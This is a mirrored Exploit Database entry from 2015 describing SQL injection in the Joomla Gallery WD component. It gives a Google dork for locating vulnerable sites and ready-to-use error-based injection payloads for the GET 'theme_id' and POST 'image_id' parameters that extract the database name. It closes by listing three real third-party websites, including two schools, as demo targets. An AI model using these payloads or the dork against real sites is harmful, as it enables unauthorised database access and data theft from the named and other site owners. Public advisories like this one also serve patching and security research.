Joomla! Component com_gallery_wd – SQL Injection

• Exploit Database
• 40 阅读

• 作者： CrashBandicot
  日期： 2015-03-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36560/

• ######################################################################
  # Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability 
  # Google Dork: inurl:option=com_gallery_wd
  # Date: 29.03.2015
  # Exploit Author: CrashBandicot (@DosPerl)
  # Vendor HomePage: http://web-dorado.com/
  # Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd
  # Tested on: Windows
  ######################################################################
  
  parameter 'theme_id' in GET vulnerable
  
  # Example :
  # Parameter: theme_id (GET)
  # Type: error-based
  # GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  
  # ==================================================================================== #
  
  parameter 'image_id' in POST vulnerable
  
  # Example :
  # URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2
  # Parameter: image_id (POST)
  # Type: error-based
  # POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search
  
  
  # ~ Demo ~ # $>
  
  http://www.cnct.tg/
  http://www.nswiop.nsw.edu.au/
  http://cnmect.licee.edu.ro/
  
  #EOF